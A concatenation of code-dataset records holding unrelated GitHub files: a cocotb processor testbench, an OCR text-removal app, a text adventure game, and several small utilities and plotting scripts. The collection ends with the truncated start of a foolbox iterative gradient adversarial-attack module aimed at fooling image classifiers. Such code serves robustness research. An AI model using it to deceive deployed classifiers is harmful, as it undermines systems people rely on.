clkedge\n print(\"dut.Inst.value\",hex(dut.Inst.value))\n # fetch CMP R1, R0\n await clkedge\n print(\"0xE1510000 dut.Inst.value\",hex(dut.Inst.value))\n # decode CMP R1, R0, fetch BEQ store\n print(\"before execute cmp dut.ALUFlags_w_w.value\",dut.ALUFlags_w.value)\n await clkedge\n # execute CMP R1, R0, decode BEQ store, fetch NOP\n print(\"before execute cmp dut.ALUFlags_w.value\",dut.ALUFlags_w.value)\n print(\"dut.PC_out.value\", int(dut.PC_out.value))\n print(\"0x0A00000F dut.Inst.value\",hex(dut.Inst.value))\n assert dut.RD1.value == r1\n assert dut.RD2.value == r0\n assert dut.FlagWriteE.value == 0b11\n print(\"before EQ cond determined from given flags \", dut.Flags.value)\n await clkedge\n # memory CMP R1, R0, execute BEQ store, decode NOP, fetch NOP\n print(\"after execute cmp dut.ALUFlags_w.value\",dut.ALUFlags_w.value)\n print(\"dut.Inst.value\",hex(dut.Inst.value))\n print(\"before before writeback cmp dut.ALUFlags_w.value\",dut.ALUFlags_w.value)\n assert dut.FlagWriteE.value == 0\n assert dut.CondE.value == 0 # EQ\n print(\"EQ cond determined from given condex \", dut.condEx.value)\n print(\"EQ cond determined from given flags \", dut.Flags.value)\n print(\"EQ cond determined from given flags write\", dut.FlagWrite.value)\n print(\"EQ condition\", dut.CondE.value)\n await clkedge\n # writeback CMP R1, R0, memory BEQ store, execute NOP, decode NOP, fetch NOP\n print(\"after EQ cond determined from given flags \", dut.Flags.value)\n print(\"after EQ condition\", dut.CondE.value)\n print(\"EQ cond determined from given condex \", dut.condEx.value)\n print(\"before writeback cmp dut.ALUFlags_w.value\",dut.ALUFlags_w.value)\n print(\"before before writeback dut.PC_out.value\", int(dut.PC_out.value))\n assert dut.ALUOutW.value == r1 - r0\n assert dut.PCSrcM.value == 0\n await clkedge\n # writeback BEQ store, memory NOP, execute NOP, decode NOP, fetch NOP\n print(\"after writeback cmp dut.ALUFlags_w.value\",dut.ALUFlags_w.value)\n print(\"before writeback dut.PC_out.value\", int(dut.PC_out.value))\n print(\"dut.Inst.value\",hex(dut.Inst.value))\n print(\"dut.ALUFlags_w.value\",dut.ALUFlags_w.value)\n await clkedge\n \"\"\"\n # writeback NOP, memory BEQ store, execute NOP, decode NOP, fetch NOP\n assert dut.PCSrcM.value == 0\n print(\"dut.Inst.value\",hex(dut.Inst.value))\n print(\"before before writeback dut.PC_out.value\", int(dut.PC_out.value))\n await clkedge\n # writeback BEQ store, memory NOP, execute NOP, decode NOP, fetch NOP\n print(\"dut.Inst.value\",hex(dut.Inst.value))\n print(\"before writeback dut.PC_out.value\", int(dut.PC_out.value))\n print(\"dut.ALUOutW.value\", int(dut.ALUOutW.value))\n \n assert dut.ALUOutW.value == 15*4\n await clkedge\n \"\"\"\n # fetch ADD R3, #4, writeback NOP, memory NOP, execute NOP, decode NOP\n print(\"after branch dut.PC_out.value\", int(dut.PC_out.value))\n print(\"dut.Inst.value\",hex(dut.Inst.value)) # buraya kadar instructionlar doğru\n await clkedge\n # decode ADD R3, #4, memory NOP, execute NOP, fetch SUB R1, #1\n print(\"0xE2833004 dut.Inst.value\",hex(dut.Inst.value))\n print(\"dut.PC_out.value\", int(dut.PC_out.value))\n await clkedge\n # execute ADD R3, #4, writeback NOP, memory NOP, decode SUB R1, #1, fetch NOP\n print(\"0xE2411001 dut.Inst.value\",hex(dut.Inst.value))\n assert dut.RD1.value == r3\n await clkedge\n # memory ADD R3, #4, writeback NOP, execute SUB R1, #1, decode NOP, fetch LDR R4, [R3]\n print(\"dut.Inst.value\",hex(dut.Inst.value))\n assert dut.RD1.value == r1\n await clkedge\n # writeback ADD R3, #4, memory SUB R1, #1, execute NOP, decode LDR R4, [R3], fetch NOP\n print(\"0xE5934000 dut.Inst.value\",hex(dut.Inst.value))\n assert dut.ALUOutW.value == r3 + 4\n r3 = r3 + 4\n await clkedge\n # writeback SUB R1, #1, memory NOP, execute LDR R4, [R3], decode NOP, fetch NOP\n assert dut.ALUOutW.value == r1 - 1\n r1 = r1 - 1\n assert dut.RD1.value == r3\n await clkedge\n # writeback NOP, memory LDR R4, [R3], execute NOP, decode NOP, fetch ADDS R2, R2, R4\n await clkedge\n # writeback LDR R4, [R3], memory NOP, execute NOP, decode ADDS R2, R2, R4, fetch B L1\n if i == 0:\n r4 = 4\n elif i == 1:\n r4 = 1\n else:\n r4 = 2\n \n assert dut.ReadDataW.value == r4\n assert dut.ALUOutW.value == r3\n await clkedge\n # writeback NOP, memory NOP, execute ADDS R2, R2, R4, decode B L1, fetch NOP\n assert dut.RD1.value == r2 \n assert dut.RD2.value == r4 \n await clkedge\n # Writeback NOP, memory ADDS R2, R2, R4, execute B L1, decode NOP, fetch NOP\n await clkedge\n # writeback ADDS R2, R2, R4, memory B L1, execute NOP, decode NOP, fetch nop \n r2 = r2 + r4 \n assert dut.ALUOutW.value == r2\n await clkedge\n # writeback B L1, memory NOP, execute NOP, decode nop, fetch NOP\n \n print(\"traverse completed***********************\")\n await clkedge\n # fetch CMP R1, R0\n await clkedge\n # decode CMP R1, R0, fetch BEQ store\n await clkedge\n # execute CMP R1, R0, decode BEQ store, fetch NOP\n assert dut.RD1.value == r1\n assert dut.RD2.value == r0\n assert dut.FlagWriteE.value == 0b11\n await clkedge\n # memory CMP R1, R0, execute BEQ store, decode NOP, fetch NOP\n assert dut.FlagWriteE.value == 0\n assert dut.CondE.value == 0b0000 # EQ\n await clkedge\n # writeback CMP R1, R0, memory BEQ store, execute NOP, decode NOP, fetch NOP\n assert dut.ALUOutW.value == r1 - r0\n assert dut.PCSrcM.value == 1\n await clkedge\n # writeback BEQ store, memory NOP, execute NOP, decode NOP, fetch NOP\n await clkedge\n # writeback NOP, memory NOP, execute NOP, decode NOP, fetch STR R2, [R3, #4]\n print(\"after branch dut.PC_out.value\", int(dut.PC_out.value))\n await clkedge\n # writeback NOP, memory NOP, execute NOP, decode STR R2, [R3, #4], fetch NOP\n await clkedge\n # writeback NOP, memory NOP, execute STR R2, [R3, #4], decode NOP, fetch NOP\n assert dut.RD1.value == r3\n assert dut.RD2.value == r2 # desired result\n await clkedge\n \n \n \n", "repo_name": "htmos6/Pipelined-Processor-With-Branch-Predictor", "sub_path": "tests/tests/array_sum_test/array_sum_test.py", "file_name": "array_sum_test.py", "file_ext": "py", "file_size_in_byte": 9791, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cocotb.start", "line_number": 85, "usage_type": "call"}, {"api_name": "cocotb.clock.Clock", "line_number": 85, "usage_type": "call"}, {"api_name": "cocotb.triggers.RisingEdge", "line_number": 87, "usage_type": "call"}, {"api_name": "cocotb.triggers.FallingEdge", "line_number": 88, "usage_type": "call"}, {"api_name": "cocotb.test", "line_number": 82, "usage_type": "call"}]} +{"seq_id": "40429805431", "text": "\"\"\"\nThis app takes a base-64 encoded image as input and returns \na modified image with all text removed. \n\nThe app is deployed as a Beam TaskQueue. You can retrieve modified images through\nthe /task endpoint. \n\"\"\"\nfrom beam import App, Runtime, Image, Output\n\nimport base64\nimport keras_ocr\nimport cv2\nimport math\nimport numpy as np\n\napp = App(\n name=\"rmtext\",\n runtime=Runtime(\n cpu=4,\n memory=\"16Gi\",\n image=Image(\n python_packages=[\n \"numpy\",\n \"matplotlib\",\n \"opencv-python\",\n \"keras_ocr\",\n \"tensorflow\",\n ],\n commands=[\"apt-get update && apt-get install -y libgl1\"],\n ),\n ),\n)\n\n\ndef midpoint(x1, y1, x2, y2):\n x_mid = int((x1 + x2) / 2)\n y_mid = int((y1 + y2) / 2)\n return (x_mid, y_mid)\n\n\n# Deploys app as a task queue, with a base64-encoded image as input\n@app.task_queue(\n outputs=[\n # Path to save generated images to\n Output(path=\"output.png\")\n ]\n)\ndef remove_text(**inputs):\n # Grab the base64 from the kwargs\n encoded_image = inputs[\"image\"]\n # Convert the base64-encoded input image to a buffer\n image_buffer = base64.b64decode(encoded_image)\n\n pipeline = keras_ocr.pipeline.Pipeline()\n\n # Read the image\n img = keras_ocr.tools.read(image_buffer)\n # Generate (word, box) tuples\n prediction_groups = pipeline.recognize([img])\n mask = np.zeros(img.shape[:2], dtype=\"uint8\")\n for box in prediction_groups[0]:\n x0, y0 = box[1][0]\n x1, y1 = box[1][1]\n x2, y2 = box[1][2]\n x3, y3 = box[1][3]\n\n x_mid0, y_mid0 = midpoint(x1, y1, x2, y2)\n x_mid1, y_mi1 = midpoint(x0, y0, x3, y3)\n\n thickness = int(math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2))\n\n cv2.line(mask, (x_mid0, y_mid0), (x_mid1, y_mi1), 255, thickness)\n img = cv2.inpaint(img, mask, 7, cv2.INPAINT_NS)\n\n img_rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n # Save the generated image to the Beam Output path\n cv2.imwrite(\"output.png\", img_rgb)\n\n\nif __name__ == \"__main__\":\n input_image = \"./coffee.jpeg\"\n with open(input_image, \"rb\") as image_file:\n encoded_image = base64.b64encode(image_file.read())\n remove_text(image=encoded_image)\n", "repo_name": "slai-labs/get-beam", "sub_path": "examples/remove-text/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2291, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 64, "dataset": "github-code", "pt": "52", "api": [{"api_name": "beam.App", "line_number": 16, "usage_type": "call"}, {"api_name": "beam.Runtime", "line_number": 18, "usage_type": "call"}, {"api_name": "beam.Image", "line_number": 21, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 52, "usage_type": "call"}, {"api_name": "keras_ocr.pipeline.Pipeline", "line_number": 54, "usage_type": "call"}, {"api_name": "keras_ocr.pipeline", "line_number": 54, "usage_type": "attribute"}, {"api_name": "keras_ocr.tools.read", "line_number": 57, "usage_type": "call"}, {"api_name": "keras_ocr.tools", "line_number": 57, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 60, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 70, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 72, "usage_type": "call"}, {"api_name": "cv2.inpaint", "line_number": 73, "usage_type": "call"}, {"api_name": "cv2.INPAINT_NS", "line_number": 73, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 75, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 75, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 77, "usage_type": "call"}, {"api_name": "beam.Output", "line_number": 45, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "43313816383", "text": "import random\nimport json\nimport os\n\n\ncheck = \"\"\nsave = \"\"\nscore = 0\n\n\n# user defined function\nwith open(\"C:/Users/larsk/OneDrive/Documenten/Projecten/file-remember/highscore.json\", \"r\") as file:\n highscore = file.read()\n highscore = json.loads(highscore)\n\n\ndef checkScore():\n for x in range(1, 11):\n if score > highscore[str(x)][\"score\"]:\n return x\n return False\n\n\ndef checking():\n check = checkScore()\n if check != False:\n updateHighscore(check)\n\n\ndef fun_intro()->bool:\n global name\n print('Welcome to THE GAME, this is a text based adventure game, where YOU are the one who makes the decisions. The objective of this game is to find out what happened to all of your stuff.')\n name = input('What is your name? : ') \n age = input(\"What is your age : \")\n if int(age) >= 13:\n print(\"You can play the game\")\n factuurtekst = \"Hello \" + str(name) + \", your choices have a huge impact on the game so be smart, enjoy. (when something is between '' please type that as your answer.)\" \n print(factuurtekst)\n doorgaan = True\n else:\n print(\"Stop going on the internet.\")\n doorgaan = False\n return doorgaan\n \n\ndef fun_op(vraagNmr, vraag, progAntwoord):\n autosave(vraagNmr)\n print(vraag)\n global score\n opt1 = input(\" {\").lower()\n if opt1 == \"a\":\n print(progAntwoord)\n delete()\n checking()\n exit()\n elif opt1 == \"b\":\n score += 1\n if score == 6:\n checking()\n\ndef autosave(flag):\n flag = json.dumps(flag)\n with open(\"C:/Users/larsk/OneDrive/Documenten/Projecten/file-remember/autosave.json\", \"w\") as save:\n save.write(flag)\n\n \ndef updateHighscore(rank):\n global highscore\n z = 10 - rank\n s = 10\n for x in range(z):\n d = s - 1\n highscore[str(s)] = {'name': highscore[str(d)][\"name\"], 'score': highscore[str(d)][\"score\"]}\n s -= 1\n highscore[str(rank)] = {'name': str(name), 'score': score}\n with open(\"C:/Users/larsk/OneDrive/Documenten/Projecten/file-remember/highscore.json\", \"w\") as file:\n save = json.dumps(highscore, indent= 2)\n file.writelines(save)\n \n\n#autosave\ndef saveCheck():\n path = os.path.dirname(os.path.abspath(__file__))\n return os.path.exists(path + \"/autosave.json\")\n\n \n# json \n\ndef delete():\n os.remove(\"C:/Users/larsk/OneDrive/Documenten/Projecten/file-remember/autosave.json\")\n\n\nwith open(\"C:/Users/larsk/OneDrive/Documenten/Projecten/file-remember/vraagnmr.json\", \"r\") as vragenJSON:\n vragenDict = json.load(vragenJSON)\n\n\nif saveCheck() == True:\n print(\"Do you want to continue your last story, type Y or N\" )\n check = input(\"{\").lower()\n if check == \"y\":\n with open(\"C:/Users/larsk/OneDrive/Documenten/Projecten/file-remember/autosave.json\", \"r\") as file:\n save1 = file.read()\n save1 = json.loads(save1)\n if check == \"n\":\n delete() \n\n \nif check == \"y\":\n for x in range(save1, len(vragenDict)+1):\n fun_op(x, vragenDict[str(x)][\"vraag\"], vragenDict[str(x)][\"progAntwoord\"])\n delete()\n\n\nelif fun_intro():\n for (k,v) in vragenDict.items():\n fun_op(int(k), vragenDict[k][\"vraag\"], vragenDict[k][\"progAntwoord\"])\n delete()\n\n", "repo_name": "LarsKalishoek/file-remember", "sub_path": "the_game.py", "file_name": "the_game.py", "file_ext": "py", "file_size_in_byte": 3279, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.loads", "line_number": 14, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 62, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 90, "usage_type": "call"}, {"api_name": "json.load", "line_number": 94, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 103, "usage_type": "call"}]} +{"seq_id": "40850521607", "text": "r\"\"\"Option\n==========\n\"\"\"\nfrom pip._internal.commands import create_command\n\n# https://pip.pypa.io/en/stable/reference/requirements-file-format/#supported-options\nWHITELIST = [\n \"-i\",\n \"--index-url\",\n \"--extra-index-url\",\n \"--no-index\",\n \"-c\",\n \"--constraint\",\n \"-r\",\n \"--requirement\",\n \"-e\",\n \"--editable\",\n \"-f\",\n \"--find-links\",\n \"--no-binary\",\n \"--only-binary\",\n \"--prefer-binary\",\n \"--require-hashes\",\n \"--pre\",\n \"--trusted-host\",\n \"--use-feature\",\n \"--global-option\",\n \"--config-settings\",\n \"--hash\",\n]\n\nOPTIONS_WITH_EQUAL = {\n opt\n + (\"=\" if option.nargs and opt in option._long_opts else \"\"): option.help\n if option.help\n else \"\"\n for option in create_command(\"install\").parser.option_list_all\n if (option._short_opts + option._long_opts)[0] in WHITELIST\n for opt in option._short_opts + option._long_opts\n}\n\nOPTIONS = {opt.rstrip(\"=\"): doc for opt, doc in OPTIONS_WITH_EQUAL.items()}\n", "repo_name": "Freed-Wu/requirements-language-server", "sub_path": "src/requirements_language_server/misc/option.py", "file_name": "option.py", "file_ext": "py", "file_size_in_byte": 980, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pip._internal.commands.create_command", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "36055531955", "text": "import os\nimport pathlib\n\nfrom neighborly.simulation import Neighborly, PluginInfo\nfrom neighborly.tracery import load_names\n\n_RESOURCES_DIR = pathlib.Path(os.path.abspath(__file__)).parent / \"data\"\n\nplugin_info = PluginInfo(\n name=\"default names plugin\",\n plugin_id=\"default.names\",\n version=\"0.1.0\",\n)\n\n\ndef setup(sim: Neighborly):\n load_names(\n sim.world,\n rule_name=\"character::last_name\",\n file_path=_RESOURCES_DIR / \"names\" / \"surnames.txt\",\n )\n\n load_names(\n sim.world,\n rule_name=\"character::first_name::NonBinary\",\n file_path=_RESOURCES_DIR / \"names\" / \"neutral_names.txt\",\n )\n\n load_names(\n sim.world,\n rule_name=\"character::first_name::Female\",\n file_path=_RESOURCES_DIR / \"names\" / \"feminine_names.txt\",\n )\n\n load_names(\n sim.world,\n rule_name=\"character::first_name::Male\",\n file_path=_RESOURCES_DIR / \"names\" / \"masculine_names.txt\",\n )\n\n load_names(\n sim.world,\n rule_name=\"restaurant_name\",\n file_path=_RESOURCES_DIR / \"names\" / \"restaurant_names.txt\",\n )\n\n load_names(\n sim.world,\n rule_name=\"bar_name\",\n file_path=_RESOURCES_DIR / \"names\" / \"bar_names.txt\",\n )\n\n load_names(\n sim.world,\n rule_name=\"settlement_name\",\n file_path=_RESOURCES_DIR / \"names\" / \"US_settlement_names.txt\",\n )\n", "repo_name": "ShiJbey/neighborly", "sub_path": "src/neighborly/plugins/defaults/names.py", "file_name": "names.py", "file_ext": "py", "file_size_in_byte": 1401, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 34, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pathlib.Path", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "neighborly.simulation.PluginInfo", "line_number": 9, "usage_type": "call"}, {"api_name": "neighborly.simulation.Neighborly", "line_number": 16, "usage_type": "name"}, {"api_name": "neighborly.tracery.load_names", "line_number": 17, "usage_type": "call"}, {"api_name": "neighborly.tracery.load_names", "line_number": 23, "usage_type": "call"}, {"api_name": "neighborly.tracery.load_names", "line_number": 29, "usage_type": "call"}, {"api_name": "neighborly.tracery.load_names", "line_number": 35, "usage_type": "call"}, {"api_name": "neighborly.tracery.load_names", "line_number": 41, "usage_type": "call"}, {"api_name": "neighborly.tracery.load_names", "line_number": 47, "usage_type": "call"}, {"api_name": "neighborly.tracery.load_names", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "35616093649", "text": "from aiohttp.test_utils import make_mocked_coro\n\nfrom virtool.tasks.progress import (\n AccumulatingProgressHandlerWrapper,\n TaskProgressHandler,\n)\n\n\nasync def test_accumulating_handler():\n set_progress = make_mocked_coro()\n set_error = make_mocked_coro()\n\n handler = TaskProgressHandler(set_error, set_progress)\n tracker = AccumulatingProgressHandlerWrapper(handler, 24)\n\n await tracker.add(3)\n\n # Expect rounded 3 / 24 * 100.\n set_progress.assert_called_with(\n 12,\n )\n\n await tracker.add(3)\n\n # Expect rounded 8 / 24 * 100.\n set_progress.assert_called_with(\n 25,\n )\n\n await tracker.add(18)\n\n set_progress.assert_called_with(\n 100,\n )\n", "repo_name": "virtool/virtool", "sub_path": "tests/tasks/test_progress.py", "file_name": "test_progress.py", "file_ext": "py", "file_size_in_byte": 707, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 41, "dataset": "github-code", "pt": "52", "api": [{"api_name": "aiohttp.test_utils.make_mocked_coro", "line_number": 10, "usage_type": "call"}, {"api_name": "aiohttp.test_utils.make_mocked_coro", "line_number": 11, "usage_type": "call"}, {"api_name": "virtool.tasks.progress.TaskProgressHandler", "line_number": 13, "usage_type": "call"}, {"api_name": "virtool.tasks.progress.AccumulatingProgressHandlerWrapper", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "27332633902", "text": "from OrganoTrack.Detecting import SegmentWithOrganoSegPy\nfrom OrganoTrack.Importing import ReadImages\nfrom OrganoTrack.Displaying import ExportImageWithContours, Display, DisplayImages\nfrom OrganoTrack.Filtering import FilterByFeature, RemoveBoundaryObjects\nfrom OrganoTrack.Measuring import CalculateRoundness\n\nfrom pathlib import Path\nimport cv2 as cv\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport skimage\nfrom skimage import measure, filters, morphology\nimport plotly\nimport plotly.express as px\nimport plotly.graph_objects as go\n\ndef Label(image):\n labeled = skimage.measure.label(image)\n return labeled\n\n\ndef CreatePropertyDF(labelledImage, property):\n dfSize = (np.max(labelledImage) + 1, 1)\n propertyDF = pd.DataFrame(np.ndarray(dfSize, dtype=str))\n\n imageObjects = skimage.measure.regionprops(labelledImage)\n for object in imageObjects:\n if property == 'roundness':\n propertyValue = CalculateRoundness(getattr(object, 'area'), getattr(object, 'perimeter'))\n else:\n propertyValue = getattr(object, property)\n objectLabel = object.label\n propertyDF.iloc[objectLabel, 0] = str(propertyValue)\n\n return propertyDF\n\ndef PlotBoxplotWithJitter(valuesDF, property, unit):\n valuesStrings = valuesDF.loc[1:, 0].values.tolist()\n valuesFloats = [float(value) for value in valuesStrings]\n valuesJitter = np.random.normal(1, 0.04, len(valuesFloats))\n\n plt.rcParams.update({'font.size': 20})\n plt.rcParams['figure.figsize'] = (3, 4)\n fig, ax = plt.subplots()\n ax.boxplot(valuesFloats, showfliers=False, widths=0.6)\n # ax.set_ylabel(f'{property.capitalize()} ({unit})')\n colourPalette = ['b', 'g', 'r', 'c']\n if property != 'area':\n ax.set_ylim([0, 1])\n plt.tick_params(\n axis='x', # changes apply to the x-axis\n which='both', # both major and minor ticks are affected\n bottom=False, # ticks along the bottom edge are off\n top=False, # ticks along the top edge are off\n labelbottom=False)\n ax.scatter(valuesJitter, valuesFloats, alpha=0.4, color=colourPalette[0])\n plt.tight_layout()\n plt.show()\n\n\ndef PlotPropertyBoxplot(binaryImage, property, unit):\n labelledImage = Label(binaryImage)\n\n propertyDF = CreatePropertyDF(labelledImage, property)\n\n PlotBoxplotWithJitter(propertyDF, property, unit)\n\n\ndef PlotWithPlotly(original, binary):\n img = original\n labels = Label(binary)\n\n fig = px.imshow(img, binary_string=True)\n fig.update_traces(hoverinfo='skip') # hover is only for label info\n\n props = measure.regionprops(labels, img)\n properties = ['area', 'eccentricity', 'solidity', 'perimeter']\n\n # For each label, add a filled scatter trace for its contour,\n # and display the properties of the label in the hover of this trace.\n for index in range(1, labels.max()):\n label_i = props[index].label\n contour = measure.find_contours(labels == label_i, 0.5)[0]\n y, x = contour.T\n hoverinfo = ''\n for prop_name in properties:\n hoverinfo += f'{prop_name}: {getattr(props[index], prop_name):.2f}
    '\n fig.add_trace(go.Scatter(\n x=x, y=y, name=label_i,\n mode='lines', fill='toself', showlegend=False,\n hovertemplate=hoverinfo, hoveron='points+fills'))\n\n plotly.io.show(fig)\n\n\n\n# Set directories\nimagesDir = Path('/home/franz/Documents/mep/report/results/measurement/input')\nexportPath = Path('/home/franz/Documents/mep/report/results/measurement/output')\nsegmentedExportPath = exportPath / 'OrganoTrack-segmented'\n\n# Import images\nrawImages, imagesPaths = ReadImages(imagesDir)\n\n# Get segmentations\nif not os.path.exists(segmentedExportPath):\n extraBlur = False\n blurSize = 3\n displaySegmentationSteps = False\n segParams = [0.5, 250, 150, extraBlur, blurSize, displaySegmentationSteps]\n saveSegParams = [True, exportPath, imagesPaths]\n predictedImages = SegmentWithOrganoSegPy(rawImages, segParams, saveSegParams)\nelse:\n predictedImages, imagesPaths = ReadImages(segmentedExportPath)\n\n# Display overlays\nfor i, (raw, prediction) in enumerate(zip(rawImages, predictedImages)):\n overlayed = ExportImageWithContours(raw, prediction)\n Display(str(i), overlayed, 1)\n # PlotWithPlotly(raw, prediction)\n\n\n# PlotPropertyBoxplot(predictedImages[3], 'area', 'pixels')\n\ncv.waitKey(0)", "repo_name": "ErasmusMC-Bioinformatics/OrganoTrack", "sub_path": "Using-OrganoTrack/report-results-measuring.py", "file_name": "report-results-measuring.py", "file_ext": "py", "file_size_in_byte": 4421, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "skimage.measure.label", "line_number": 20, "usage_type": "call"}, {"api_name": "skimage.measure", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 26, "usage_type": "call"}, {"api_name": "skimage.measure.regionprops", "line_number": 28, "usage_type": "call"}, {"api_name": "skimage.measure", "line_number": 28, "usage_type": "attribute"}, {"api_name": "OrganoTrack.Measuring.CalculateRoundness", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 42, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.rcParams.update", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 44, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 45, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tick_params", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "plotly.express.imshow", "line_number": 75, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 75, "usage_type": "name"}, {"api_name": "skimage.measure.regionprops", "line_number": 78, "usage_type": "call"}, {"api_name": "skimage.measure", "line_number": 78, "usage_type": "name"}, {"api_name": "skimage.measure.find_contours", "line_number": 85, "usage_type": "call"}, {"api_name": "skimage.measure", "line_number": 85, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 90, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 90, "usage_type": "name"}, {"api_name": "plotly.io.show", "line_number": 95, "usage_type": "call"}, {"api_name": "plotly.io", "line_number": 95, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 100, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 101, "usage_type": "call"}, {"api_name": "OrganoTrack.Importing.ReadImages", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path", "line_number": 108, "usage_type": "attribute"}, {"api_name": "OrganoTrack.Detecting.SegmentWithOrganoSegPy", "line_number": 114, "usage_type": "call"}, {"api_name": "OrganoTrack.Importing.ReadImages", "line_number": 116, "usage_type": "call"}, {"api_name": "OrganoTrack.Displaying.ExportImageWithContours", "line_number": 120, "usage_type": "call"}, {"api_name": "OrganoTrack.Displaying.Display", "line_number": 121, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 127, "usage_type": "call"}]} +{"seq_id": "14910961719", "text": "#coding=utf-8\r\n\r\nfrom __future__ import division\r\nimport numpy as np\r\nfrom abc import abstractmethod\r\nimport logging\r\nimport warnings\r\n\r\nfrom foolbox.attacks.base import Attack\r\nfrom foolbox.attacks.base import call_decorator\r\nfrom foolbox import distances\r\nfrom foolbox.utils import crossentropy\r\n\r\n\r\nlog_or_not = False\r\n\r\ndef l2_distance(a, b):\r\n return (np.sum((a/255.0 - b/255.0) ** 2))**0.5\r\n\r\n\r\ndef step_value_estimate(noise_g, noise_now, alpha, step_now,):\r\n #用来判断是否仍有迭代下去的价值\r\n \"\"\"Base class for iterative (projected) gradient attacks.\r\n noise_g : 高斯噪声幅度\r\n noise_now : 迭代到当前这一步已经走过的步数\r\n alpha : 使用cab平均每一步实现的噪声压缩,默认0.9985\r\n step_now : 当前已经走过的步数\r\n step_future: 未来还要走的步数\r\n \"\"\"\r\n noise_future = noise_now + noise_now/step_now\r\n # print(\"noise_g, noise_now, step_now, current_value\", noise_g, noise_now, step_now, noise_future**2 + (1-alpha)*(noise_g**2) - noise_g*noise_future)\r\n if noise_future**2 + (1-alpha)*(noise_g**2) - noise_g*noise_future >= 0:\r\n #无意义\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef binary_value_estimate(noise_l, noise_r, alpha):\r\n #用来判断在寻找合适步长时是否仍有二分下去的价值\r\n \"\"\"Base class for iterative (projected) gradient attacks.\r\n noise_l : 直线上非对抗样本的最大噪声\r\n noise_r : 直线上确定是对抗样本的最小噪声(noise_g)\r\n alpha : 使用cab平均每一步实现的噪声压缩,默认0.9985\r\n \"\"\"\r\n\r\n if (alpha - 0.75)*noise_r - 0.25*noise_l > 0:\r\n #值得继续二分\r\n return True\r\n else:\r\n return False\r\n\r\n\r\n\r\n\r\nclass IterativeProjectedGradientBaseAttack(Attack):\r\n \"\"\"Base class for iterative (projected) gradient attacks.\r\n\r\n Concrete subclasses should implement __call__, _gradient\r\n and _clip_perturbation.\r\n\r\n TODO: add support for other loss-functions, e.g. the CW loss function,\r\n see https://github.com/MadryLab/mnist_challenge/blob/master/pgd_attack.py\r\n \"\"\"\r\n\r\n @abstractmethod\r\n def _gradient(self, a, x, class_, strict=True):\r\n raise NotImplementedError\r\n\r\n @abstractmethod\r\n def _clip_perturbation(self, a, 